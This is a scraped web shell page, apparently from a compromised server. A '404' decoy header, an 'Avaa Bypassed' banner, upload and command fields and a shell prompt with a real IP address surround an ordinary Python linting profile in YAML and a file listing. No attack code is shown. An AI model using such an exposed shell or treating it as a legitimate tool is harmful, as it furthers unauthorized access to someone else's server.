404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.116.87.225: ~ $
allow-shorthand: false

inherits:
  - strictness_medium

pylint:
  disable:
    - blacklisted-name
    - missing-docstring
    - line-too-long
    - E1103
    - duplicate-code
    - too-many-branches
    - too-many-arguments
    - too-many-locals
    - too-many-statements
    - R0924
    - unnecessary-pass
    - unnecessary-lambda
    - duplicate-key
    - eval-used
    - lost-exception
    - bad-staticmethod-argument
    - protected-access
    - signature-differs
    - lowercase-l-suffix
    - deprecated-module
    - global-variable-not-assigned
    - unused-import
    - unused-variable
    - unused-argument
    - unused-wildcard-import
    - redefined-builtin
    - redefine-in-handler
    - bare-except
    - logging-not-lazy
    - bad-format-string-key
    - anomalous-unicode-escape-in-string
    - W5101

pyflakes:
  disable:
    - F401
    - F841

frosted:
  disable:
    - E101
    - E307
    - W101

pycodestyle:
  disable:
    - E501
    - E711
    - E712
    - E721
    - W503

pyroma:
  disable:
    - PYR06
    - PYR09

pydocstyle:
  run: false

Filemanager

Name Type Size Permission Actions
default.yaml File 100 B 0644
doc_warnings.yaml File 48 B 0644
flake8.yaml File 156 B 0644
full_pep8.yaml File 873 B 0644
member_warnings.yaml File 82 B 0644
no_doc_warnings.yaml File 271 B 0644
no_member_warnings.yaml File 83 B 0644
no_pep8.yaml File 348 B 0644
no_test_warnings.yaml File 175 B 0644
strictness_high.yaml File 818 B 0644
strictness_low.yaml File 1.04 KB 0644
strictness_medium.yaml File 1.79 KB 0644
strictness_none.yaml File 151 B 0644
strictness_veryhigh.yaml File 594 B 0644
strictness_verylow.yaml File 833 B 0644
test_warnings.yaml File 23 B 0644